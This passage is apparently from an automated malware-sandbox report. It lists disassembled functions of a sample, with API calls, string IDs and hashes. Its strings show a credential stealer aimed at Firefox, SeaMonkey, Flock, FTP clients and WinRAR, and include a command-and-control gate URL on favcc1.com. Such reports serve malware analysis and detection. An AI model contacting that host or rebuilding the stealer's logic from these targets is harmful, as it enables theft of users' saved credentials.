                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                  • String ID: PathToExe
                  • API String ID: 3012581338-1982016430
                  • Opcode ID: 8fc4a7197e77e29558b2c4ea1f285fe0d321b03f23eae897123b6be3f6153990
                  • Instruction ID: e05590e6535ae6685e2b6e147f5bd9336f463a7a79db1f61f60288ed2bd1106c
                  • Opcode Fuzzy Hash: 8fc4a7197e77e29558b2c4ea1f285fe0d321b03f23eae897123b6be3f6153990
                  • Instruction Fuzzy Hash: D5310F7195410ABAEF017FA1CD42EEE7F75EF04304F104436BA10750F2DA799A60AB59
                  Function 0040480D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00404823
                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040485C
                  • StrStrIA.SHLWAPI(?,Line), ref: 0040488D
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404912
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID: Line
                  • API String ID: 4012628704-1898322888
                  • Opcode ID: 1949a6836d03bb652c20a5e8a052bfec5c03bee313242801b0904d336b9e4700
                  • Instruction ID: 675c8a07e7e1bb1752cec05100cc8cb43714288bd8c889818cf31f8b99cbcb65
                  • Opcode Fuzzy Hash: 1949a6836d03bb652c20a5e8a052bfec5c03bee313242801b0904d336b9e4700
                  • Instruction Fuzzy Hash: 06211CB590011CBACF21AB91CC41AED7BB9BF40344F00C4B6B645B50A0DB799B959F99
                  Function 0040E380 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E393
                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E3CC
                  • StrStrIA.SHLWAPI(?,.wjf), ref: 0040E413
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E440
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID: .wjf
                  • API String ID: 4012628704-198459012
                  • Opcode ID: 55e47d3f3289d49ee6a7a33006f948b733df385b918f2b365cce33ef626a8d8f
                  • Instruction ID: 6c02f0466b4f9df86687fc2424817bc04636176610657e92471d7ef074694a56
                  • Opcode Fuzzy Hash: 55e47d3f3289d49ee6a7a33006f948b733df385b918f2b365cce33ef626a8d8f
                  • Instruction Fuzzy Hash: BA110A3191011CBADF11AF51CC41AEEBBB9FF04304F0484B6B554B11A1DBB99BA1AF99
                  Function 0040456C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004027F7: GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                    • Part of subcall function 004027F7: GlobalFix.KERNEL32(?), ref: 004028BB
                    • Part of subcall function 004027F7: GlobalUnWire.KERNEL32(?), ref: 004028DD
                  • 760B6F40.OLE32(?,00000000), ref: 0040458F
                  • wsprintfA.USER32 ref: 004045D6
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004045E2
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$PathTempWirelstrlenwsprintf
                  • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                  • API String ID: 1250355450-1100116640
                  • Opcode ID: ad6d44f564695db3ab2c15567973978c7b08e7f4d263dc27b3ffdeedcd3e39df
                  • Instruction ID: 476b96121221588422184147df88c85db44375d6439ca1fb70a35fe213d0d45f
                  • Opcode Fuzzy Hash: ad6d44f564695db3ab2c15567973978c7b08e7f4d263dc27b3ffdeedcd3e39df
                  • Instruction Fuzzy Hash: BA1139A68040987DDB61E2E64C05EFFBABC590D305B1404A7B6A0E20C2D67DD780AB38
                  Function 00409D44 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D72
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB7
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                  • API String ID: 3062143572-2631691096
                  • Opcode ID: f2e7d6a03e8775ac6a460e64fe2e570f19d589566516169aad488d4ffff388ac
                  • Instruction ID: d2b4e7d78cc91440fea06b4d62b44e227251dce01812483e6cbe8542a7eb3fd3
                  • Opcode Fuzzy Hash: f2e7d6a03e8775ac6a460e64fe2e570f19d589566516169aad488d4ffff388ac
                  • Instruction Fuzzy Hash: CFF01230640209BADF21EB51CC43FCD3E65AB18748F1180BA7604750E3DFB9DAD09A4C
                  Function 00409E81 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409EAF
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409EF4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                  • API String ID: 3062143572-164276155
                  • Opcode ID: cffc946e5c70c67377bf9b530a782a48f80d94cf4536443f49a40c861b4ab8bc
                  • Instruction ID: 1a60b26f2cef7b3fc6b89140cb347d155aaca61cbf7821f01a22f921f7ed0fbd
                  • Opcode Fuzzy Hash: cffc946e5c70c67377bf9b530a782a48f80d94cf4536443f49a40c861b4ab8bc
                  • Instruction Fuzzy Hash: 6FF01D30680208BADF61AF51CC47FCD7B66AB14748F114066BA04751E3D7B9DAD09A4C
                  Function 00409F08 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409F36
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409F7B
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Flock$Software\Mozilla$\Flock\Browser\
                  • API String ID: 3062143572-1276807325
                  • Opcode ID: a81acee50c988d2229b2a0ae7bb798958e7643d9ce21e312b325d402cf4c4bd6
                  • Instruction ID: d861b07d1b8ad2e660f739a266466c7483912b0fe8370ab32b8f8ef2644ba391
                  • Opcode Fuzzy Hash: a81acee50c988d2229b2a0ae7bb798958e7643d9ce21e312b325d402cf4c4bd6
                  • Instruction Fuzzy Hash: 14F01D30A80208BADF11BB61CC43FCE3A65AB14708F118066BA48750E3D7FADED19A4C
                  Function 00409F8F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409FBD
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A002
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                  • API String ID: 3062143572-2716603926
                  • Opcode ID: 0f7124a31275a86d80dac1bb0d947f5e9d9bc12efe797630f7412fc249802a4f
                  • Instruction ID: d1112612b1a46cdeef82dd0bcd8bd37197290873b4cb64d34add8b3e191e55b1
                  • Opcode Fuzzy Hash: 0f7124a31275a86d80dac1bb0d947f5e9d9bc12efe797630f7412fc249802a4f
                  • Instruction Fuzzy Hash: 00F03631680208BADF51BF51CC43FCD3A69AB14708F1181667A08750E3D7F9DAD19B4C
                  Function 0041A1E0 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 447cc8f8b9961fb6f404b1aff310624d7fb9f51710268817aabf9f584430c5c7
                  • Instruction ID: 547a6951327828336fda3b8732ab33c97358f9db061d9a844eef5dd18b4c364b
                  • Opcode Fuzzy Hash: 447cc8f8b9961fb6f404b1aff310624d7fb9f51710268817aabf9f584430c5c7
                  • Instruction Fuzzy Hash: 01514D716463524BD7218EB8CCC06E17790EB52334B1C077AC9E1C73C6E7BD589A835A
                  Function 0040CA59 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,3D-FTP), ref: 0040CA80
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                  • API String ID: 1884169789-4074339522
                  • Opcode ID: c12fbb7bc964d824d3b55f3c062eb16f44b6ed1314a77927b347d0aafbc1e4a4
                  • Instruction ID: a8733c1ff825e96504dcbe7eb892a61180eb4e38a9024d90baa2159e94926ceb
                  • Opcode Fuzzy Hash: c12fbb7bc964d824d3b55f3c062eb16f44b6ed1314a77927b347d0aafbc1e4a4
                  • Instruction Fuzzy Hash: 9911A0B0740105BAEF11B7728C42FAF2E599B81758F24063B7810B11E7DABDCE4196AC
                  Function 00401E4C Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 33stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00401E6D
                  • lstrlen.KERNEL32(00000000,?), ref: 00401E77
                  • lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID: AHA
                  • API String ID: 2414487701-3076688622
                  • Opcode ID: 6674b94cc77f2e0a6f1955d4e23cbb7d70a5e4db5cab77b2ade7379070a8ed64
                  • Instruction ID: 178668e0e615fd63de4fdc3408f6ca54e04455abbfa1e4d9e740eb1e58ce44ed
                  • Opcode Fuzzy Hash: 6674b94cc77f2e0a6f1955d4e23cbb7d70a5e4db5cab77b2ade7379070a8ed64
                  • Instruction Fuzzy Hash: D9F03075500208BEDF003F62CC85ADD3A59FB50358F00C53BB81519262D7BDCAD48B88
                  Function 004027F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                  • GlobalFix.KERNEL32(?), ref: 004028BB
                  • GlobalUnWire.KERNEL32(?), ref: 004028DD
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Globallstrcatlstrcpy$PathTempWire
                  • String ID: Software\WinRAR
                  • API String ID: 3226276397-224198155
                  • Opcode ID: 676548b5628ded24d8e3cfe4573b5b59dfa7322358113053d667f2eb1f454c16
                  • Instruction ID: 97cf82eb6f1cceabb41ab8afc57efebc2fc522024ebae68c1ff7343e90c2be1a
                  • Opcode Fuzzy Hash: 676548b5628ded24d8e3cfe4573b5b59dfa7322358113053d667f2eb1f454c16
                  • Instruction Fuzzy Hash: AD211D76900109BBDF45BBE1CD46EDEBB79AF44348F108576B600B10E1D6B98B90AB18
                  Function 0040AED7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AEED
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AF21
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B009
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACAA
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACBD
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACD0
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACE3
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACF6
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD09
                    • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD1C
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: wsprintf$CloseEnumOpen
                  • String ID: SiteServers
                  • API String ID: 1693054222-2402683488
                  • Opcode ID: a6b8d91e0917ab086c4b5147d8d3222d652008688037575bcb3cc7aa7cfb34ca
                  • Instruction ID: b395abaf3e1b08a804a5ea431434a32d392a7f1d6147eb10e670670b0e6ee063
                  • Opcode Fuzzy Hash: a6b8d91e0917ab086c4b5147d8d3222d652008688037575bcb3cc7aa7cfb34ca
                  • Instruction Fuzzy Hash: 84310B7190021DEADF21AB51CD42BDDBAB9FF04304F04C0B6F154710A1DB795BA2AF9A
                  Function 00408D1E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408D31
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D65
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E04
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: MRU
                  • API String ID: 1332880857-344939820
                  • Opcode ID: 6168fb36f25b5f7b66d10fcc31b4f7edb56b1be7ca534c2ea631991655323644
                  • Instruction ID: fd2b7b5fdf6a5293b80450f41cc552674484159ea622ee0c62823a6ce73faf9f
                  • Opcode Fuzzy Hash: 6168fb36f25b5f7b66d10fcc31b4f7edb56b1be7ca534c2ea631991655323644
                  • Instruction Fuzzy Hash: 7121F331900108BADF11AB51CD42BDE7BBABF00304F1085BAB554B50E1DAB99B91AF98
                  Function 00401C8D Relevance: 6.1, APIs: 4, Instructions: 87registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401CD2
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401CED
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401D23
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D45
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: 5ea8590fc12a1ae2543d0d529a5eb40d0662086919bfdd64ef1848b73175ae4c
                  • Instruction ID: f684edda37e69a729a9dfe3678b60f116084d598a8b6b39bf51dbd963b68634d
                  • Opcode Fuzzy Hash: 5ea8590fc12a1ae2543d0d529a5eb40d0662086919bfdd64ef1848b73175ae4c
                  • Instruction Fuzzy Hash: 36213C31A00109BBEF229E60CD81BAE3BBAEF41344F144076F910A61E0D678EA95DB59
                  Function 0040BE0B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BE49
                  • lstrcmp.KERNEL32(table,?), ref: 0040BE7E
                    • Part of subcall function 0040BAF7: StrStrIA.SHLWAPI(?,() ), ref: 0040BB07
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmplstrcmpi
                  • String ID: logins$table
                  • API String ID: 3524194181-3800951466
                  • Opcode ID: 1d43deef1a95535c72f6405b56c276556b6277d08792a2f75f6faed488742071
                  • Instruction ID: 49a45b8434778a44db87e02ffc41af5581711f80529b0f1b9d25a128445543eb
                  • Opcode Fuzzy Hash: 1d43deef1a95535c72f6405b56c276556b6277d08792a2f75f6faed488742071
                  • Instruction Fuzzy Hash: 4E31EB7580020EFACF21DF94CD469EE7B79EB05328F204276A121B21E0D7759A54DF98
                  Function 00406FBB Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "password" : "
                  • API String ID: 0-2310853927
                  • Opcode ID: aa802b69c49c85c0b7e52117ffc5ad815f1008bd26feb98690d85486ee2951c5
                  • Instruction ID: a8505eba7fb01dd768c26025fbea84f3e084961c27416feb9209b2297d187da2
                  • Opcode Fuzzy Hash: aa802b69c49c85c0b7e52117ffc5ad815f1008bd26feb98690d85486ee2951c5
                  • Instruction Fuzzy Hash: 6421CF71C08109FACF11BBA18C029EE7E66AF41358F20413BF440B51A1E3795B91A7AA
                  Function 0040D2CB Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0040D315
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocalwsprintf
                  • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                  • API String ID: 988369812-376751567
                  • Opcode ID: d3b17e864ad3287657529d6def3fc0b74c71cecd924962d85a68b8d1ef5d7896
                  • Instruction ID: a7350f98b8087840315ccef8506eaf137621d83714f745573814e202e155aedd
                  • Opcode Fuzzy Hash: d3b17e864ad3287657529d6def3fc0b74c71cecd924962d85a68b8d1ef5d7896
                  • Instruction Fuzzy Hash: 8F011A71D40109FAEF00BAD0CC82EEEBA79AB40308F548576F910B11D1D77D9A98DA6A
                  Function 00401226 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
                  • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseExitFileHandleProcessRead
                  • String ID:
                  • API String ID: 1390701169-0
                  • Opcode ID: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
                  • Instruction ID: 77f65db424b8dbfecb4d9d0992eed673c7479144c9e59104ccc0ab534344ee26
                  • Opcode Fuzzy Hash: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
                  • Instruction Fuzzy Hash: D6F0FF31940108BADF21AB50CC42FDD7A78AB64349F1080A6B544F50E0D6B99BE49B54
                  Function 0040FD78 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00403FFB: WSAStartup.WS2_32(00000101,?), ref: 00404010
                  • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FE34
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: SleepStartup
                  • String ID: Client Hash$http://dillion0mill.favcc1.com/gate.php
                  • API String ID: 1372284471-3207914052
                  • Opcode ID: 643a3d45d5c554f9d4aac8a0d1128cfdb7dc02042811c707ba6ac29e48a5f2dd
                  • Instruction ID: ac9d98a840a6ec41b44305a73576d32a4574797fa82ac13b5d2204e52a3275dd
                  • Opcode Fuzzy Hash: 643a3d45d5c554f9d4aac8a0d1128cfdb7dc02042811c707ba6ac29e48a5f2dd
                  • Instruction Fuzzy Hash: EC210331D0014A9ADF31EAE1C9457FF7A74AB40349F10043BE241715E2D7BC4D99DBAA
                  Function 0040A875 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 75COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIW.SHLWAPI(00000000,004162E9), ref: 0040A904
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
